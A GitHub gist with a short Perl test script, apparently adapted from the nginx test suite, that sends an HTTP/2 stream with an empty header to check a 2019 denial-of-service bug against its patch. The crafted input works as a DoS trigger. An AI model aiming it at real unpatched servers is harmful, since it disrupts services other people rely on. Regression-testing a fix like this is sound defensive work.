Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Empty headers in HTTP/2 streams can cause DoS. A test based on http://hg.nginx.org/nginx-tests .
# Takes around 8 seconds without the patch at https://github.com/nginx/nginx/commit/6dfbc8b1c2116f362bb871efebbf9df576738e89
# Start 2019-08-14 1565776248
# End 2019-08-14 1565776256
# https://www.nginx.com/blog/nginx-updates-mitigate-august-2019-http-2-vulnerabilities/
use POSIX qw/strftime/;
print "Start ", strftime('%Y-%m-%d %s',localtime), " \n";
$s = Test::Nginx::HTTP2->new();
$sid = $s->new_stream({ headers => [
{ name => ':method', value => 'GET', mode => 0 },
{ name => ':scheme', value => 'http', mode => 0 },
{ name => ':path', value => '/', mode => 0 },
{ name => ':authority', value => 'localhost', mode => 1 },
{ name => '', value => "", mode => 2 }]});
$frames = $s->read(all => [{ type => 'HEADERS' }]);
($frame) = grep { $_->{type} eq "HEADERS" } @$frames;
print Dumper(\$frame);
print "End ", strftime('%Y-%m-%d %s',localtime), " \n";
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.